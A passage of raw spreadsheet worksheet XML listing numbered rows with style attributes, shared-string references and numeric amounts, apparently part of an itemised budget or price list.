      <c r="Q253" s="47"/>
      <c r="R253" s="47"/>
      <c r="S253" s="47"/>
      <c r="T253" s="47"/>
      <c r="U253" s="47"/>
      <c r="V253" s="47"/>
      <c r="W253" s="47"/>
      <c r="X253" s="47"/>
      <c r="Y253" s="47"/>
      <c r="Z253" s="47"/>
      <c r="AA253" s="47"/>
      <c r="AB253" s="47"/>
      <c r="AC253" s="47"/>
      <c r="AD253" s="47"/>
      <c r="AE253" s="47"/>
      <c r="AF253" s="47"/>
      <c r="AG253" s="47"/>
    </row>
    <row r="254" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A254" s="25"/>
      <c r="B254" s="36">
        <v>378</v>
      </c>
      <c r="C254" s="36"/>
      <c r="D254" s="63" t="s">
        <v>1070</v>
      </c>
      <c r="E254" s="63" t="s">
        <v>4602</v>
      </c>
      <c r="F254" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G254" s="26">
        <v>1</v>
      </c>
      <c r="H254" s="26"/>
      <c r="I254" s="26"/>
      <c r="J254" s="50">
        <v>960</v>
      </c>
      <c r="L254" s="25"/>
      <c r="M254" s="25"/>
      <c r="N254" s="47"/>
      <c r="O254" s="47"/>
      <c r="P254" s="47"/>
      <c r="Q254" s="47"/>
      <c r="R254" s="47"/>
      <c r="S254" s="47"/>
      <c r="T254" s="47"/>
      <c r="U254" s="47"/>
      <c r="V254" s="47"/>
      <c r="W254" s="47"/>
      <c r="X254" s="47"/>
      <c r="Y254" s="47"/>
      <c r="Z254" s="47"/>
      <c r="AA254" s="47"/>
      <c r="AB254" s="47"/>
      <c r="AC254" s="47"/>
      <c r="AD254" s="47"/>
      <c r="AE254" s="47"/>
      <c r="AF254" s="47"/>
      <c r="AG254" s="47"/>
    </row>
    <row r="255" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A255" s="25"/>
      <c r="B255" s="36">
        <v>379</v>
      </c>
      <c r="C255" s="36"/>
      <c r="D255" s="63" t="s">
        <v>4603</v>
      </c>
      <c r="E255" s="63" t="s">
        <v>4604</v>
      </c>
      <c r="F255" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G255" s="26">
        <v>1</v>
      </c>
      <c r="H255" s="26"/>
      <c r="I255" s="26"/>
      <c r="J255" s="50">
        <v>800</v>
      </c>
      <c r="K255" s="26"/>
      <c r="L255" s="25"/>
      <c r="M255" s="25"/>
      <c r="N255" s="47"/>
      <c r="O255" s="47"/>
      <c r="P255" s="47"/>
      <c r="Q255" s="47"/>
      <c r="R255" s="47"/>
      <c r="S255" s="47"/>
      <c r="T255" s="47"/>
      <c r="U255" s="47"/>
      <c r="V255" s="47"/>
      <c r="W255" s="47"/>
      <c r="X255" s="47"/>
      <c r="Y255" s="47"/>
      <c r="Z255" s="47"/>
      <c r="AA255" s="47"/>
      <c r="AB255" s="47"/>
      <c r="AC255" s="47"/>
      <c r="AD255" s="47"/>
      <c r="AE255" s="47"/>
      <c r="AF255" s="47"/>
      <c r="AG255" s="47"/>
    </row>
    <row r="256" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A256" s="25"/>
      <c r="B256" s="36">
        <v>380</v>
      </c>
      <c r="C256" s="36"/>
      <c r="D256" s="63" t="s">
        <v>4482</v>
      </c>
      <c r="E256" s="63" t="s">
        <v>4605</v>
      </c>
      <c r="F256" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G256" s="26">
        <v>1</v>
      </c>
      <c r="H256" s="26"/>
      <c r="I256" s="26"/>
      <c r="J256" s="50">
        <v>640</v>
      </c>
      <c r="K256" s="26"/>
      <c r="L256" s="25"/>
      <c r="M256" s="25"/>
      <c r="N256" s="47"/>
      <c r="O256" s="47"/>
      <c r="P256" s="47"/>
      <c r="Q256" s="47"/>
      <c r="R256" s="47"/>
      <c r="S256" s="47"/>
      <c r="T256" s="47"/>
      <c r="U256" s="47"/>
      <c r="V256" s="47"/>
      <c r="W256" s="47"/>
      <c r="X256" s="47"/>
      <c r="Y256" s="47"/>
      <c r="Z256" s="47"/>
      <c r="AA256" s="47"/>
      <c r="AB256" s="47"/>
      <c r="AC256" s="47"/>
      <c r="AD256" s="47"/>
      <c r="AE256" s="47"/>
      <c r="AF256" s="47"/>
      <c r="AG256" s="47"/>
    </row>
    <row r="257" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A257" s="25"/>
      <c r="B257" s="36">
        <v>381</v>
      </c>
      <c r="C257" s="36"/>
      <c r="D257" s="63" t="s">
        <v>4482</v>
      </c>
      <c r="E257" s="63" t="s">
        <v>4606</v>
      </c>
      <c r="F257" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G257" s="26">
        <v>1</v>
      </c>
      <c r="H257" s="26"/>
      <c r="I257" s="26"/>
      <c r="J257" s="50">
        <v>720</v>
      </c>
      <c r="K257" s="26"/>
      <c r="L257" s="25"/>
      <c r="M257" s="25"/>
      <c r="N257" s="47"/>
      <c r="O257" s="47"/>
      <c r="P257" s="47"/>
      <c r="Q257" s="47"/>
      <c r="R257" s="47"/>
      <c r="S257" s="47"/>
      <c r="T257" s="47"/>
      <c r="U257" s="47"/>
      <c r="V257" s="47"/>
      <c r="W257" s="47"/>
      <c r="X257" s="47"/>
      <c r="Y257" s="47"/>
      <c r="Z257" s="47"/>
      <c r="AA257" s="47"/>
      <c r="AB257" s="47"/>
      <c r="AC257" s="47"/>
      <c r="AD257" s="47"/>
      <c r="AE257" s="47"/>
      <c r="AF257" s="47"/>
      <c r="AG257" s="47"/>
    </row>
    <row r="258" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A258" s="25"/>
      <c r="B258" s="36">
        <v>382</v>
      </c>
      <c r="C258" s="36"/>
      <c r="D258" s="66" t="s">
        <v>4595</v>
      </c>
      <c r="E258" s="77" t="s">
        <v>4607</v>
      </c>
      <c r="F258" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G258" s="23">
        <v>1</v>
      </c>
      <c r="H258" s="36"/>
      <c r="I258" s="76"/>
      <c r="J258" s="50">
        <v>19200</v>
      </c>
      <c r="K258" s="26"/>
      <c r="L258" s="25"/>
      <c r="M258" s="25"/>
      <c r="N258" s="47"/>
      <c r="O258" s="47"/>
      <c r="P258" s="47"/>
      <c r="Q258" s="47"/>
      <c r="R258" s="47"/>
      <c r="S258" s="47"/>
      <c r="T258" s="47"/>
      <c r="U258" s="47"/>
      <c r="V258" s="47"/>
      <c r="W258" s="47"/>
      <c r="X258" s="47"/>
      <c r="Y258" s="47"/>
      <c r="Z258" s="47"/>
      <c r="AA258" s="47"/>
      <c r="AB258" s="47"/>
      <c r="AC258" s="47"/>
      <c r="AD258" s="47"/>
      <c r="AE258" s="47"/>
      <c r="AF258" s="47"/>
      <c r="AG258" s="47"/>
    </row>
    <row r="259" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A259" s="25"/>
      <c r="B259" s="36">
        <v>383</v>
      </c>
      <c r="C259" s="36"/>
      <c r="D259" s="63" t="s">
        <v>4608</v>
      </c>
      <c r="E259" s="63" t="s">
        <v>4609</v>
      </c>
      <c r="F259" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G259" s="26">
        <v>1</v>
      </c>
      <c r="H259" s="26"/>
      <c r="I259" s="75"/>
      <c r="J259" s="50">
        <v>800</v>
      </c>
      <c r="L259" s="25"/>
      <c r="M259" s="25"/>
      <c r="N259" s="47"/>
      <c r="O259" s="47"/>
      <c r="P259" s="47"/>
      <c r="Q259" s="47"/>
      <c r="R259" s="47"/>
      <c r="S259" s="47"/>
      <c r="T259" s="47"/>
      <c r="U259" s="47"/>
      <c r="V259" s="47"/>
      <c r="W259" s="47"/>
      <c r="X259" s="47"/>
      <c r="Y259" s="47"/>
      <c r="Z259" s="47"/>
      <c r="AA259" s="47"/>
      <c r="AB259" s="47"/>
      <c r="AC259" s="47"/>
      <c r="AD259" s="47"/>
      <c r="AE259" s="47"/>
      <c r="AF259" s="47"/>
      <c r="AG259" s="47"/>
    </row>
    <row r="260" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A260" s="25"/>
      <c r="B260" s="36">
        <v>384</v>
      </c>
      <c r="C260" s="36"/>
      <c r="D260" s="63" t="s">
        <v>4610</v>
      </c>
      <c r="E260" s="63" t="s">
        <v>4611</v>
      </c>
      <c r="F260" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G260" s="26">
        <v>1</v>
      </c>
      <c r="H260" s="26"/>
      <c r="I260" s="75"/>
      <c r="J260" s="50">
        <v>4800</v>
      </c>
      <c r="L260" s="25"/>
      <c r="M260" s="25"/>
      <c r="N260" s="47"/>
      <c r="O260" s="47"/>
      <c r="P260" s="47"/>
      <c r="Q260" s="47"/>
      <c r="R260" s="47"/>
      <c r="S260" s="47"/>
      <c r="T260" s="47"/>
      <c r="U260" s="47"/>
      <c r="V260" s="47"/>
      <c r="W260" s="47"/>
      <c r="X260" s="47"/>
      <c r="Y260" s="47"/>
      <c r="Z260" s="47"/>
      <c r="AA260" s="47"/>
      <c r="AB260" s="47"/>
      <c r="AC260" s="47"/>
      <c r="AD260" s="47"/>
      <c r="AE260" s="47"/>
      <c r="AF260" s="47"/>
      <c r="AG260" s="47"/>
    </row>
    <row r="261" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A261" s="25"/>
      <c r="B261" s="36">
        <v>385</v>
      </c>
      <c r="C261" s="36"/>
      <c r="D261" s="63" t="s">
        <v>4610</v>
      </c>
      <c r="E261" s="63" t="s">
        <v>4612</v>
      </c>
      <c r="F261" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G261" s="26">
        <v>1</v>
      </c>
      <c r="H261" s="26"/>
      <c r="I261" s="75"/>
      <c r="J261" s="50">
        <v>1920</v>
      </c>
      <c r="L261" s="25"/>
      <c r="M261" s="25"/>
      <c r="N261" s="47"/>
      <c r="O261" s="47"/>
      <c r="P261" s="47"/>
      <c r="Q261" s="47"/>
      <c r="R261" s="47"/>
      <c r="S261" s="47"/>
      <c r="T261" s="47"/>
      <c r="U261" s="47"/>
      <c r="V261" s="47"/>
      <c r="W261" s="47"/>
      <c r="X261" s="47"/>
      <c r="Y261" s="47"/>
      <c r="Z261" s="47"/>
      <c r="AA261" s="47"/>
      <c r="AB261" s="47"/>
      <c r="AC261" s="47"/>
      <c r="AD261" s="47"/>
      <c r="AE261" s="47"/>
      <c r="AF261" s="47"/>
      <c r="AG261" s="47"/>
    </row>
    <row r="262" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A262" s="25"/>
      <c r="B262" s="36">
        <v>386</v>
      </c>
      <c r="C262" s="36"/>
      <c r="D262" s="63" t="s">
        <v>3899</v>
      </c>
      <c r="E262" s="63" t="s">
        <v>4613</v>
      </c>
      <c r="F262" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G262" s="26">
        <v>1</v>
      </c>
      <c r="H262" s="26"/>
      <c r="I262" s="26"/>
      <c r="J262" s="50">
        <v>7200</v>
      </c>
      <c r="L262" s="25"/>
      <c r="M262" s="25"/>
      <c r="N262" s="47"/>
      <c r="O262" s="47"/>
      <c r="P262" s="47"/>
      <c r="Q262" s="47"/>
      <c r="R262" s="47"/>
      <c r="S262" s="47"/>
      <c r="T262" s="47"/>
      <c r="U262" s="47"/>
      <c r="V262" s="47"/>
      <c r="W262" s="47"/>
      <c r="X262" s="47"/>
      <c r="Y262" s="47"/>
      <c r="Z262" s="47"/>
      <c r="AA262" s="47"/>
      <c r="AB262" s="47"/>
      <c r="AC262" s="47"/>
      <c r="AD262" s="47"/>
      <c r="AE262" s="47"/>
      <c r="AF262" s="47"/>
      <c r="AG262" s="47"/>
    </row>
    <row r="263" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A263" s="25"/>
      <c r="B263" s="36">
        <v>387</v>
      </c>
      <c r="C263" s="36"/>
      <c r="D263" s="63" t="s">
        <v>4614</v>
      </c>
      <c r="E263" s="63" t="s">
        <v>4615</v>
      </c>
      <c r="F263" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G263" s="26">
        <v>1</v>
      </c>
      <c r="H263" s="26"/>
      <c r="I263" s="26"/>
      <c r="J263" s="50">
        <v>2560</v>
      </c>
      <c r="L263" s="25"/>
      <c r="M263" s="25"/>
      <c r="N263" s="47"/>
      <c r="O263" s="47"/>
      <c r="P263" s="47"/>
      <c r="Q263" s="47"/>
      <c r="R263" s="47"/>
      <c r="S263" s="47"/>
      <c r="T263" s="47"/>
      <c r="U263" s="47"/>
      <c r="V263" s="47"/>
      <c r="W263" s="47"/>
      <c r="X263" s="47"/>
      <c r="Y263" s="47"/>
      <c r="Z263" s="47"/>
      <c r="AA263" s="47"/>
      <c r="AB263" s="47"/>
      <c r="AC263" s="47"/>
      <c r="AD263" s="47"/>
      <c r="AE263" s="47"/>
      <c r="AF263" s="47"/>
      <c r="AG263" s="47"/>
    </row>
    <row r="264" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A264" s="25"/>
      <c r="B264" s="36">
        <v>388</v>
      </c>
      <c r="C264" s="36"/>
      <c r="D264" s="63" t="s">
        <v>4614</v>
      </c>
      <c r="E264" s="63" t="s">
        <v>4616</v>
      </c>
      <c r="F264" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G264" s="26">
        <v>1</v>
      </c>
      <c r="H264" s="26"/>
      <c r="I264" s="26"/>
      <c r="J264" s="50">
        <v>2880</v>
      </c>
      <c r="L264" s="25"/>
      <c r="M264" s="25"/>
      <c r="N264" s="47"/>
      <c r="O264" s="47"/>
      <c r="P264" s="47"/>
      <c r="Q264" s="47"/>
      <c r="R264" s="47"/>
      <c r="S264" s="47"/>
      <c r="T264" s="47"/>
      <c r="U264" s="47"/>
      <c r="V264" s="47"/>
      <c r="W264" s="47"/>
      <c r="X264" s="47"/>
      <c r="Y264" s="47"/>
      <c r="Z264" s="47"/>
      <c r="AA264" s="47"/>
      <c r="AB264" s="47"/>
      <c r="AC264" s="47"/>
      <c r="AD264" s="47"/>
      <c r="AE264" s="47"/>
      <c r="AF264" s="47"/>
      <c r="AG264" s="47"/>
    </row>
    <row r="265" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A265" s="25"/>
      <c r="B265" s="36">
        <v>389</v>
      </c>
      <c r="C265" s="36"/>
      <c r="D265" s="63" t="s">
        <v>4617</v>
      </c>
      <c r="E265" s="63" t="s">
        <v>4618</v>
      </c>
      <c r="F265" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G265" s="26">
        <v>1</v>
      </c>
      <c r="H265" s="26"/>
      <c r="I265" s="26"/>
      <c r="J265" s="50">
        <v>4800</v>
      </c>
      <c r="L265" s="25"/>
      <c r="M265" s="25"/>
      <c r="N265" s="47"/>
      <c r="O265" s="47"/>
      <c r="P265" s="47"/>
      <c r="Q265" s="47"/>
      <c r="R265" s="47"/>
      <c r="S265" s="47"/>
      <c r="T265" s="47"/>
      <c r="U265" s="47"/>
      <c r="V265" s="47"/>
      <c r="W265" s="47"/>
      <c r="X265" s="47"/>
      <c r="Y265" s="47"/>
      <c r="Z265" s="47"/>
      <c r="AA265" s="47"/>
      <c r="AB265" s="47"/>
      <c r="AC265" s="47"/>
      <c r="AD265" s="47"/>
      <c r="AE265" s="47"/>
      <c r="AF265" s="47"/>
      <c r="AG265" s="47"/>
    </row>
    <row r="266" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A266" s="25"/>
      <c r="B266" s="36">
        <v>390</v>
      </c>
      <c r="C266" s="36"/>
      <c r="D266" s="63" t="s">
        <v>4617</v>
      </c>
      <c r="E266" s="63" t="s">
        <v>4619</v>
      </c>
      <c r="F266" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G266" s="26">
        <v>1</v>
      </c>
      <c r="H266" s="26"/>
      <c r="I266" s="26"/>
      <c r="J266" s="50">
        <v>8000</v>
      </c>
      <c r="L266" s="25"/>
      <c r="M266" s="25"/>
      <c r="N266" s="47"/>
      <c r="O266" s="47"/>
      <c r="P266" s="83"/>
    </row>
    <row r="267" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A267" s="25"/>
      <c r="B267" s="36">
        <v>391</v>
      </c>
      <c r="C267" s="36"/>
      <c r="D267" s="63" t="s">
        <v>2440</v>
      </c>
      <c r="E267" s="63" t="s">
        <v>4620</v>
      </c>
      <c r="F267" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G267" s="26">
        <v>1</v>
      </c>
      <c r="H267" s="26"/>
      <c r="I267" s="26"/>
      <c r="J267" s="50">
        <v>4000</v>
      </c>
      <c r="K267" s="26"/>
      <c r="L267" s="25"/>
      <c r="M267" s="25"/>
      <c r="N267" s="47"/>
      <c r="O267" s="47"/>
      <c r="P267" s="83"/>
    </row>
    <row r="268" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A268" s="25"/>
      <c r="B268" s="36">
        <v>392</v>
      </c>
      <c r="C268" s="36"/>
      <c r="D268" s="63" t="s">
        <v>4621</v>
      </c>
      <c r="E268" s="63" t="s">
        <v>4622</v>
      </c>
      <c r="F268" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G268" s="26">
        <v>1</v>
      </c>
      <c r="H268" s="26"/>
      <c r="I268" s="26"/>
      <c r="J268" s="50">
        <v>2880</v>
      </c>
      <c r="K268" s="26"/>
      <c r="L268" s="25"/>
      <c r="M268" s="25"/>
      <c r="N268" s="47"/>
      <c r="O268" s="47"/>
      <c r="P268" s="83"/>
    </row>
    <row r="269" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A269" s="25"/>
      <c r="B269" s="36">
        <v>393</v>
      </c>
      <c r="C269" s="36"/>
      <c r="D269" s="63" t="s">
        <v>1942</v>
      </c>
      <c r="E269" s="63" t="s">
        <v>4261</v>
      </c>
      <c r="F269" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G269" s="26">
        <v>1</v>
      </c>
      <c r="H269" s="26"/>
      <c r="I269" s="26"/>
      <c r="J269" s="50">
        <v>800</v>
      </c>
      <c r="K269" s="26"/>
      <c r="L269" s="25"/>
      <c r="M269" s="25"/>
      <c r="N269" s="47"/>
      <c r="O269" s="47"/>
      <c r="P269" s="83"/>
    </row>
    <row r="270" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A270" s="25"/>
      <c r="B270" s="74" t="s">
        <v>4623</v>
      </c>
      <c r="C270" s="74"/>
      <c r="D270" s="74"/>
      <c r="E270" s="74"/>
      <c r="F270" s="36"/>
      <c r="G270" s="26"/>
      <c r="H270" s="26"/>
      <c r="I270" s="26"/>
      <c r="J270" s="50">
        <v>0</v>
      </c>
      <c r="L270" s="25"/>
      <c r="M270" s="25"/>
      <c r="N270" s="47"/>
      <c r="O270" s="47"/>
      <c r="P270" s="83"/>
    </row>
    <row r="271" customHeight="1" spans="1:16">
      <c r="A271" s="25"/>
      <c r="B271" s="36">
        <v>394</v>
      </c>
      <c r="C271" s="36"/>
      <c r="D271" s="63" t="s">
        <v>4624</v>
      </c>
      <c r="F271" s="36" t="s">
        <v>4625</v>
      </c>
      <c r="G271" s="26">
        <v>1</v>
      </c>
      <c r="J271" s="50">
        <v>960</v>
      </c>
      <c r="K271" s="26"/>
      <c r="L271" s="25"/>
      <c r="M271" s="25"/>
      <c r="N271" s="25"/>
      <c r="O271" s="25"/>
      <c r="P271" s="30"/>
    </row>
    <row r="272" customHeight="1" spans="1:16">
      <c r="A272" s="25"/>
      <c r="B272" s="74" t="s">
        <v>3807</v>
      </c>
      <c r="C272" s="74"/>
      <c r="D272" s="74"/>
      <c r="E272" s="74"/>
      <c r="F272" s="36"/>
      <c r="G272" s="26"/>
      <c r="J272" s="50">
        <v>0</v>
      </c>
      <c r="K272" s="26"/>
      <c r="L272" s="25"/>
      <c r="M272" s="25"/>
      <c r="N272" s="25"/>
      <c r="O272" s="25"/>
      <c r="P272" s="30"/>
    </row>
    <row r="273" customHeight="1" spans="1:16">
      <c r="A273" s="25"/>
      <c r="B273" s="36">
        <v>396</v>
      </c>
      <c r="C273" s="36"/>
      <c r="D273" s="63" t="s">
        <v>4626</v>
      </c>
      <c r="E273" s="63" t="s">
        <v>4627</v>
      </c>
      <c r="F273" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G273" s="26">
        <v>1</v>
      </c>
      <c r="J273" s="50">
        <v>2400</v>
      </c>
      <c r="K273" s="26"/>
      <c r="L273" s="25"/>
      <c r="M273" s="25"/>
      <c r="N273" s="25"/>
      <c r="O273" s="25"/>
      <c r="P273" s="30"/>
    </row>
    <row r="274" customHeight="1" spans="1:16">
      <c r="A274" s="25"/>
      <c r="B274" s="36">
        <v>397</v>
      </c>
      <c r="C274" s="36"/>
      <c r="D274" s="63" t="s">
        <v>4628</v>
      </c>
      <c r="E274" s="63" t="s">
        <v>4627</v>
      </c>
      <c r="F274" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G274" s="26">
        <v>1</v>
      </c>
      <c r="J274" s="50">
        <v>640</v>
      </c>
      <c r="K274" s="26"/>
      <c r="L274" s="25"/>
      <c r="M274" s="25"/>
      <c r="N274" s="25"/>
      <c r="O274" s="25"/>
      <c r="P274" s="30"/>
    </row>
    <row r="275" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A275" s="25"/>
      <c r="B275" s="36">
        <v>398</v>
      </c>
      <c r="C275" s="36"/>
      <c r="D275" s="63" t="s">
        <v>4629</v>
      </c>
      <c r="E275" s="63" t="s">
        <v>4627</v>
      </c>
      <c r="F275" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G275" s="23">
        <v>1</v>
      </c>
      <c r="H275" s="36"/>
      <c r="I275" s="76"/>
      <c r="J275" s="50">
        <v>640</v>
      </c>
      <c r="K275" s="26"/>
      <c r="L275" s="25"/>
      <c r="M275" s="25"/>
      <c r="N275" s="47"/>
      <c r="O275" s="47"/>
      <c r="P275" s="47"/>
      <c r="Q275" s="47"/>
      <c r="R275" s="47"/>
      <c r="S275" s="47"/>
      <c r="T275" s="47"/>
      <c r="U275" s="47"/>
      <c r="V275" s="47"/>
      <c r="W275" s="47"/>
      <c r="X275" s="47"/>
      <c r="Y275" s="47"/>
      <c r="Z275" s="47"/>
      <c r="AA275" s="47"/>
      <c r="AB275" s="47"/>
      <c r="AC275" s="47"/>
      <c r="AD275" s="47"/>
      <c r="AE275" s="47"/>
      <c r="AF275" s="47"/>
      <c r="AG275" s="47"/>
    </row>
    <row r="276" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A276" s="25"/>
      <c r="B276" s="36">
        <v>399</v>
      </c>
      <c r="C276" s="36"/>
      <c r="D276" s="63" t="s">
        <v>4630</v>
      </c>
      <c r="E276" s="63" t="s">
        <v>4627</v>
      </c>
      <c r="F276" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G276" s="26">
        <v>1</v>
      </c>
      <c r="H276" s="26"/>
      <c r="I276" s="75"/>
      <c r="J276" s="50">
        <v>1920</v>
      </c>
      <c r="L276" s="25"/>
      <c r="M276" s="25"/>
      <c r="N276" s="47"/>
      <c r="O276" s="47"/>
      <c r="P276" s="47"/>
      <c r="Q276" s="47"/>
      <c r="R276" s="47"/>
      <c r="S276" s="47"/>
      <c r="T276" s="47"/>
      <c r="U276" s="47"/>
      <c r="V276" s="47"/>
      <c r="W276" s="47"/>
      <c r="X276" s="47"/>
      <c r="Y276" s="47"/>
      <c r="Z276" s="47"/>
      <c r="AA276" s="47"/>
      <c r="AB276" s="47"/>
      <c r="AC276" s="47"/>
      <c r="AD276" s="47"/>
      <c r="AE276" s="47"/>
      <c r="AF276" s="47"/>
      <c r="AG276" s="47"/>
    </row>
    <row r="277" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A277" s="25"/>
      <c r="B277" s="36">
        <v>400</v>
      </c>
      <c r="C277" s="36"/>
      <c r="D277" s="63" t="s">
        <v>4631</v>
      </c>
      <c r="E277" s="63"/>
      <c r="F277" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G277" s="26">
        <v>1</v>
      </c>
      <c r="H277" s="26"/>
      <c r="I277" s="75"/>
      <c r="J277" s="50">
        <v>640</v>
      </c>
      <c r="L277" s="25"/>
      <c r="M277" s="25"/>
      <c r="N277" s="47"/>
      <c r="O277" s="47"/>
      <c r="P277" s="47"/>
      <c r="Q277" s="47"/>
      <c r="R277" s="47"/>
      <c r="S277" s="47"/>
      <c r="T277" s="47"/>
      <c r="U277" s="47"/>
      <c r="V277" s="47"/>
      <c r="W277" s="47"/>
      <c r="X277" s="47"/>
      <c r="Y277" s="47"/>
      <c r="Z277" s="47"/>
      <c r="AA277" s="47"/>
      <c r="AB277" s="47"/>
      <c r="AC277" s="47"/>
      <c r="AD277" s="47"/>
      <c r="AE277" s="47"/>
      <c r="AF277" s="47"/>
      <c r="AG277" s="47"/>
    </row>
    <row r="278" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A278" s="25"/>
      <c r="B278" s="36">
        <v>401</v>
      </c>
      <c r="C278" s="36"/>
      <c r="D278" s="63" t="s">
        <v>4632</v>
      </c>
      <c r="E278" s="63" t="s">
        <v>4627</v>
      </c>
      <c r="F278" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G278" s="26">
        <v>1</v>
      </c>
      <c r="H278" s="26"/>
      <c r="I278" s="75"/>
      <c r="J278" s="50">
        <v>640</v>
      </c>
      <c r="L278" s="25"/>
      <c r="M278" s="25"/>
      <c r="N278" s="47"/>
      <c r="O278" s="47"/>
      <c r="P278" s="83"/>
    </row>
    <row r="279" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A279" s="25"/>
      <c r="B279" s="36">
        <v>402</v>
      </c>
      <c r="C279" s="36"/>
      <c r="D279" s="63" t="s">
        <v>4633</v>
      </c>
      <c r="E279" s="63"/>
      <c r="F279" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G279" s="26">
        <v>1</v>
      </c>
      <c r="H279" s="26"/>
      <c r="I279" s="26"/>
      <c r="J279" s="50">
        <v>48</v>
      </c>
      <c r="L279" s="25"/>
      <c r="M279" s="25"/>
      <c r="N279" s="47"/>
      <c r="O279" s="47"/>
      <c r="P279" s="83"/>
    </row>
    <row r="280" s="23" customFormat="1" customHeight="1" spans="1:16">
      <c r="A280" s="25"/>
      <c r="B280" s="36">
        <v>403</v>
      </c>
      <c r="C280" s="36"/>
      <c r="D280" s="63" t="s">
        <v>4634</v>
      </c>
      <c r="E280" s="63"/>
      <c r="F280" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G280" s="26">
        <v>1</v>
      </c>
      <c r="H280" s="26"/>
      <c r="I280" s="26"/>
      <c r="J280" s="50">
        <v>32</v>
      </c>
      <c r="L280" s="25"/>
      <c r="M280" s="25"/>
      <c r="N280" s="47"/>
      <c r="O280" s="47"/>
      <c r="P280" s="83"/>
    </row>
    <row r="281" customHeight="1" spans="1:16">
      <c r="A281" s="25"/>
      <c r="B281" s="36">
        <v>404</v>
      </c>
      <c r="C281" s="36"/>
      <c r="D281" s="63" t="s">
        <v>4635</v>
      </c>
      <c r="E281" s="63" t="s">
        <v>4627</v>
      </c>
      <c r="F281" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G281" s="26">
        <v>1</v>
      </c>
      <c r="J281" s="50">
        <v>240</v>
      </c>
      <c r="K281" s="23"/>
      <c r="L281" s="25"/>
      <c r="M281" s="25"/>
      <c r="N281" s="25"/>
      <c r="O281" s="25"/>
      <c r="P281" s="30"/>
    </row>
    <row r="282" customHeight="1" spans="1:16">
      <c r="A282" s="25"/>
      <c r="B282" s="36">
        <v>405</v>
      </c>
      <c r="C282" s="36"/>
      <c r="D282" s="63" t="s">
        <v>4636</v>
      </c>
      <c r="F282" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G282" s="26">
        <v>1</v>
      </c>
      <c r="J282" s="50">
        <v>160</v>
      </c>
      <c r="K282" s="23"/>
      <c r="L282" s="25"/>
      <c r="M282" s="25"/>
      <c r="N282" s="25"/>
      <c r="O282" s="25"/>
      <c r="P282" s="30"/>
    </row>
    <row r="283" customHeight="1" spans="1:16">
      <c r="A283" s="25"/>
      <c r="B283" s="36">
        <v>406</v>
      </c>
      <c r="C283" s="36"/>
      <c r="D283" s="63" t="s">
        <v>4637</v>
      </c>
      <c r="E283" s="63" t="s">
        <v>4627</v>
      </c>
      <c r="F283" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G283" s="26">
        <v>1</v>
      </c>
      <c r="J283" s="50">
        <v>2080</v>
      </c>
      <c r="K283" s="23"/>
      <c r="L283" s="25"/>
      <c r="M283" s="25"/>
      <c r="N283" s="25"/>
      <c r="O283" s="25"/>
      <c r="P283" s="30"/>
    </row>
    <row r="284" customHeight="1" spans="1:16">
      <c r="A284" s="25"/>
      <c r="B284" s="36">
        <v>407</v>
      </c>
      <c r="C284" s="36"/>
      <c r="D284" s="63" t="s">
        <v>4638</v>
      </c>
      <c r="E284" s="63" t="s">
        <v>4627</v>
      </c>
      <c r="F284" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G284" s="26">
        <v>1</v>
      </c>
      <c r="J284" s="50">
        <v>1280</v>
      </c>
      <c r="K284" s="26"/>
      <c r="L284" s="25"/>
      <c r="M284" s="25"/>
      <c r="N284" s="25"/>
      <c r="O284" s="25"/>
      <c r="P284" s="30"/>
    </row>
    <row r="285" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A285" s="25"/>
      <c r="B285" s="36">
        <v>408</v>
      </c>
      <c r="C285" s="36"/>
      <c r="D285" s="63" t="s">
        <v>4639</v>
      </c>
      <c r="E285" s="63"/>
      <c r="F285" s="36" t="s">
        <v>507</v>
      </c>
      <c r="G285" s="26">
        <v>1</v>
      </c>
      <c r="H285" s="26"/>
      <c r="I285" s="26"/>
      <c r="J285" s="50">
